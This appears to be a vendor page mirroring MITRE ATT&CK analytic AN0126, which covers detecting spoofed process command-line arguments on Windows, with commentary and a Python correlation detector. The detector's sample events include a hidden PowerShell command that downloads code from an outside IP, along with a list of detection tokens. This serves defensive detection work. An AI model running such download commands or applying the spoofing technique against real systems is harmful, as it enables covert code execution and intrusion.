MITRE ATT&CK® Analytic

AN0126: Analytic 0126

Inconsistencies between process command-line arguments logged at creation time and subsequent process behavior. Defender perspective: monitoring for processes launched in a suspended state, followed by memory modifications (e.g., WriteProcessMemory targeting the PEB) that overwrite arguments before execution resumes. Detection also includes observing anomalous behaviors from processes whose logged arguments do not align with executed activity (e.g., network connections, file writes, or registry modifications).

Enterprise | AN0126 | Analytic | Object v1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

AN0126 matters because it focuses on a gap executives and SOC leaders often assume is covered: the command line recorded when a Windows process starts may not match what the process later does. If defenders rely only on process creation logs, suspicious execution can be missed when arguments are changed in memory before the process resumes or when runtime behavior contradicts the original logged command line.

Executive priority

Treat this as a validation item for Windows endpoint monitoring quality, not just another alert rule. Leaders should ask whether SOC and IR teams can prove they collect both process-start evidence and subsequent behavior evidence such as memory modification, network activity, file writes, and registry changes. This supports incident decision-making, audit evidence for endpoint visibility, and prioritization of EDR/SIEM coverage where command-line logging alone is insufficient.

Technical view

For Windows, validate detection logic that correlates process creation command-line arguments with later process behavior. The official analytic highlights processes launched in a suspended state, memory modifications such as WriteProcessMemory targeting the PEB, argument overwrites before execution resumes, and anomalous runtime activity that does not align with the logged arguments. Because no ATT&CK tactics or relationship context are supplied, implementation should remain behavior-focused rather than attribution- or campaign-focused.

Likely telemetry

  • Windows process creation events with full command-line arguments
  • Process state or thread activity indicating suspended launch and later resume
  • Endpoint telemetry for cross-process memory modification, including WriteProcessMemory-like behavior
  • Memory or process metadata relevant to PEB argument changes where available
  • Process-correlated network connections

Detection direction

  • Confirm that process creation logs are not the only data source used for this behavior; compare logged arguments against later observed process activity.
  • Tune correlation around processes that start suspended, are modified in memory, and then resume execution.
  • Look for mismatches between benign-looking command lines and subsequent network, file, or registry activity inconsistent with those arguments.
  • Baseline legitimate software in the local environment before treating suspended launch or memory modification alone as high confidence.
  • Document blind spots where endpoint tooling cannot observe memory modification, PEB changes, or process-resume behavior.
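The correlation the bullets above describe, as an added example (not code from MITRE ATT&CK or from this page). It uses Python over a flat, sensor-agnostic event schema that is assumed here: `process_create` carries the creation-time command line and whether the process started suspended, `memory_write` records a cross-process write with the targeted region, `thread_resume` marks execution resuming, `cmdline_observed` is a later re-read of the process command line by the sensor, and `network_connect` is a process-correlated connection. The sample events, the hint tokens and the image baseline are constructed for the example; real Sysmon or EDR fields must be mapped onto this shape, and Sysmon alone does not record the suspended flag or PEB writes, which is exactly the blind spot the last bullet asks you to document.

```python
"""Correlation logic for AN0126: compare a process's command line as logged at
creation with what the process later does.  Added example, not code from
MITRE ATT&CK or from the page above.  The flat event schema (type, pid,
target_pid, region, ...) and the sample events are constructed; real Sysmon
or EDR telemetry uses other field names and must be mapped onto this shape."""

from collections import defaultdict

# Constructed sample telemetry (not from a real host).  pid 3000 is an assumed
# launcher; pid 4120 is created suspended, has its PEB command line overwritten,
# is resumed and then beacons out.  pid 5200 is a benign control whose logged
# and later-observed command lines agree.
SAMPLE_EVENTS = [
    {"t": 1.0, "type": "process_create", "pid": 4120, "ppid": 3000,
     "image": "powershell.exe", "cmdline": "powershell.exe -NoProfile Get-Date",
     "suspended": True},
    {"t": 1.1, "type": "memory_write", "pid": 3000, "target_pid": 4120,
     "region": "PEB.ProcessParameters.CommandLine", "size": 160},
    {"t": 1.2, "type": "thread_resume", "pid": 3000, "target_pid": 4120},
    {"t": 2.0, "type": "cmdline_observed", "pid": 4120,  # later PEB re-read by the sensor
     "cmdline": "powershell.exe -NoProfile -w hidden -c "
                "(New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"},
    {"t": 2.5, "type": "network_connect", "pid": 4120, "dst": "198.51.100.7:80"},
    {"t": 5.0, "type": "process_create", "pid": 5200, "ppid": 3000,
     "image": "cmd.exe", "cmdline": "cmd.exe /c dir C:\\Temp", "suspended": False},
    {"t": 5.2, "type": "cmdline_observed", "pid": 5200, "cmdline": "cmd.exe /c dir C:\\Temp"},
]

# Tokens whose presence in the creation-time command line makes later network
# activity expected.  Assumed starting set; extend from the local baseline.
NETWORK_HINTS = ("http://", "https://", "webclient", "invoke-webrequest",
                 "downloadstring", "\\\\")
# Images that talk to the network regardless of arguments (assumed local baseline).
NETWORK_BASELINE_IMAGES = {"msedge.exe", "chrome.exe", "outlook.exe", "svchost.exe"}


def detect(events, hints=NETWORK_HINTS, baseline=NETWORK_BASELINE_IMAGES):
    """Return one alert dict per inconsistency found in a stream of events."""
    created = {}                     # pid -> process_create event
    peb_written = defaultdict(list)  # pid -> PEB writes seen before resume
    resumed = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e["t"]):
        kind, pid = ev["type"], ev["pid"]
        if kind == "process_create":
            created[pid] = ev
        elif kind == "memory_write":
            tgt = ev["target_pid"]
            # Cross-process write into the PEB/ProcessParameters of a still-suspended child
            if (tgt in created and created[tgt]["suspended"] and tgt not in resumed
                    and ev["region"].startswith("PEB") and pid != tgt):
                peb_written[tgt].append(ev)
        elif kind == "thread_resume":
            tgt = ev["target_pid"]
            resumed.add(tgt)
            if peb_written.get(tgt):
                alerts.append({"rule": "suspended_launch_peb_overwrite_resume", "pid": tgt,
                               "writer_pid": peb_written[tgt][0]["pid"],
                               "logged_cmdline": created[tgt]["cmdline"]})
        elif kind == "cmdline_observed" and pid in created:
            # Creation-time command line no longer matches what the process carries
            if ev["cmdline"] != created[pid]["cmdline"]:
                alerts.append({"rule": "cmdline_mismatch_creation_vs_runtime", "pid": pid,
                               "logged_cmdline": created[pid]["cmdline"],
                               "observed_cmdline": ev["cmdline"]})
        elif kind == "network_connect" and pid in created:
            # Network activity that the logged arguments give no reason to expect
            c = created[pid]
            cl = c["cmdline"].lower()
            if c["image"].lower() not in baseline and not any(h in cl for h in hints):
                alerts.append({"rule": "network_activity_not_implied_by_cmdline", "pid": pid,
                               "logged_cmdline": c["cmdline"], "dst": ev["dst"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two points a practitioner should carry into a real implementation. First, the command line does not live in the PEB page itself: `PEB->ProcessParameters` points to a separate `RTL_USER_PROCESS_PARAMETERS` block that holds the `CommandLine` string, so a write-target rule that matches only the PEB page will miss the overwrite; match writes to that parameters block as well. Second, the network rule is deliberately a weak heuristic; on its own it is a baselining exercise, and it earns confidence only when combined with the suspended-launch and mismatch rules on the same process, which is the correlation the page is asking for.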

Mitigation priorities

  • Prioritize endpoint visibility: ensure Windows command-line logging and EDR process telemetry are enabled where policy allows.
  • Ensure SOC workflows correlate process creation, memory modification, and runtime behavior rather than reviewing each signal in isolation.
  • Use least-privilege and application control policies where appropriate so that fewer accounts and unapproved binaries are able to spawn and manipulate other processes.
  • Preserve relevant endpoint telemetry for incident response so analysts can reconstruct process argument changes and subsequent activity.
  • Review detection coverage as part of managed detection, IR readiness, and compliance evidence for endpoint monitoring controls.

Analyst notes and limits

The supplied object is a detection analytic, not a full ATT&CK technique entry. Its practical value is in testing whether defenders can detect command-line argument inconsistency on Windows by correlating creation-time logging with later memory and behavior telemetry.

Official detection text, tactics, relationships, aliases, and labels were not supplied. This take does not infer adversary attribution, active exploitation, impact, or coverage beyond the Windows platform and official description provided. Local telemetry availability and baselining are required to determine operational effectiveness.

Official MITRE ATT&CK definition

Analytic 0126

Inconsistencies between process command-line arguments logged at creation time and subsequent process behavior. Defender perspective: monitoring for processes launched in a suspended state, followed by memory modifications (e.g., WriteProcessMemory targeting the PEB) that overwrite arguments before execution resumes. Detection also includes observing anomalous behaviors from processes whose logged arguments do not align with executed activity (e.g., network connections, file writes, or registry modifications).

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 693608e7ce7af5c6...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status         | Raw hash
19.1    |                 | 1.0            |          | Current bundle | 693608e7ce7a…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack: AN0126 (source URL)

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.